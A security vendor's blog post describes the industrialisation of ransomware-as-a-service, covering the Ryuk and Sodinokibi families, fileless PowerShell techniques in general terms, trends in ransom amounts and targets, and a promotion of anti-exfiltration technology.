Critical infrastructure attacks and sky-high ransoms are just the beginning

Ransomware isn’t new, but the industrial complex behind today’s biggest attacks certainly is and ransomware as a service is the latest business model used to wage war on our infrastructure.

Only a few years ago ransom demands from cybercriminal gangs were mostly four or five-figure sums, but those early successes have emboldened today’s cybercriminals to demand millions of dollars – and receive payment!

Ransom amounts have grown alongside the sophistication and scalability of today’s most popular ransomware variants. Cybercrime is a multi-trillion dollar global industry, and it’s growing considerably year-over-year.

BlackFog collects and analyzes ransomware industry data which enables us to stay ahead of trends and protect our customers from the latest threats. Some of the insights we’ve gathered over the last few months indicate an alarming consolidation of cybercrime resources that will lead to new headline-making attacks in the months to come.

What Does Consolidated Industrialized Cybercrime Look Like?

Most of the data we’ve analyzed throughout the year indicates significant consolidation efforts in the cybercrime world. A handful of highly active ransomware-as-a-service vendors dominate the landscape and provide infrastructural support for a loose confederation of entrepreneurial hackers around the world.

These “ransomware gangs” operate more like corporate managed service providers. They hire specialized developers and group them into separate departments. They have dedicated accounting teams, territory-specific negotiators and executive leaders.

These are not lone-wolf operations, and they haven’t been for a long time.

In fact, major cybercrime vendors are consolidating resources and analyzing their performance to maximize results. More than half of all serialized ransomware attacks use software from two distinct families: Ryuk and Sodinokibi.

  • Ryuk is responsible for a large number of attacks on hospitals and other essential elements of critical infrastructure. Ryuk-type ransomware was responsible for last year’s $67 million attack against Universal Health Services, and the subsequent wave of attacks against US healthcare operators.
  • Sodinokibi is the name for the ransomware that REvil uses, and is implicated in many high-cost, high-profile attacks such as Kaseya. It is increasingly used in double-extortion attacks, where attackers demand one ransom to restore system functionality and another      to avoid leaking sensitive data to the public.

While these two ransomware families function in entirely different ways, they do share some key similarities. Both of them use PowerShell exploits to run ransomware code entirely in memory and remotely download payloads – an entirely fileless approach.

BlackFog research shows that 78% of all attacks now use PowerShell exploits, rendering file-based detection and prevention methods obsolete. PowerShell exploits do not produce an attack signature the way file-based ransomware does. More than eight out of every ten attacks threaten to exfiltrate data, making double-exploitation possible.

Consolidation Doesn’t Mean Predictability

It might be tempting to think that if major cybercrime organizations are consolidating, they may start using more predictable approaches. Unfortunately, the opposite is more likely. With greater resources, led through a better-organized executive structure, cybercrime organizations will be able to deliver more diverse and sophisticated ransomware services to their clients.

One of the more interesting developments of the past year supports this theory. The average ransom payout for Q2 2021 is actually lower than it was in the previous quarter. At $135,576, the average ransom request is 38% lower than it was only a few months ago.

The fundamentals of industrialized cybercrime have not significantly changed during this time, so it’s unlikely that cybercriminals simply decided to be more modest in their financial goals.

Instead, the more likely explanation for this drop in average ransomware payouts is something else entirely. Cybercriminals may be testing new capabilities made possible by new technologies and better organization.

The past few years of ransomware data supports this. Average ransom demands have a tendency to pull back significantly before rising to new highs. The same thing happened in Q4 2020, when the month of October saw the highest number of ransomware attacks for the entire year. We may see a similar trend forming during the next quarter of this year.

Specialization is Key to Industrialized Ransomware

One of the benefits of industrial consolidation is the ability to better utilize limited resources and capitalize on specialist expertise. Putting top-performers to work on the tasks they do best enables economies of scale that benefit the entire organization.

This is exactly the approach that cybercrime groups have adopted. In our research of ransomware targets by industry, we saw a marked increase in the number of healthcare, technology and finance firms attacked during the last quarter. Government agencies still take the top spot, and the United States still accounts for 50% of all ransomware attacks.

The renewed focus on specific types of organizations speaks to the development of specialized ransomware talent. A particular cybercriminal or team of cybercriminals may spend a great deal of time learning how American healthcare institutions work.

They may experiment – with relatively low ransoms – on a large number of smaller healthcare operators, gauging their capabilities before going after major institutions and demanding seven-figure sums. The experience they gain from each attack gives them insight into how to improve their approach for the next attack.

Security professionals have to recognize what this means. Every cyberattack attempt generates valuable data for cybercriminals whether it’s successful or not. A single institution may find itself targeted by a small, focused team of specialists dedicated to repeated, sustained attacks on that institution specifically.

Next-Generation Cyberattacks Demand Next-Generation Defenses

The proliferation of highly organized cybercrime organizations supporting fileless ransomware attacks puts the entire cybersecurity industry at risk. There is good reason to believe that a fresh wave of high-profile attacks will dominate headlines in 2022, and most organizations are not equipped to detect or prevent them.

Anti Data Exfiltration (ADX) technology offers valuable protection from known and unknown ransomware attacks by preventing the unauthorized transfer of data outside the network. This renders ransomware ineffective and prevents Sodinokibi-style double exploits without impacting everyday usability inside the network.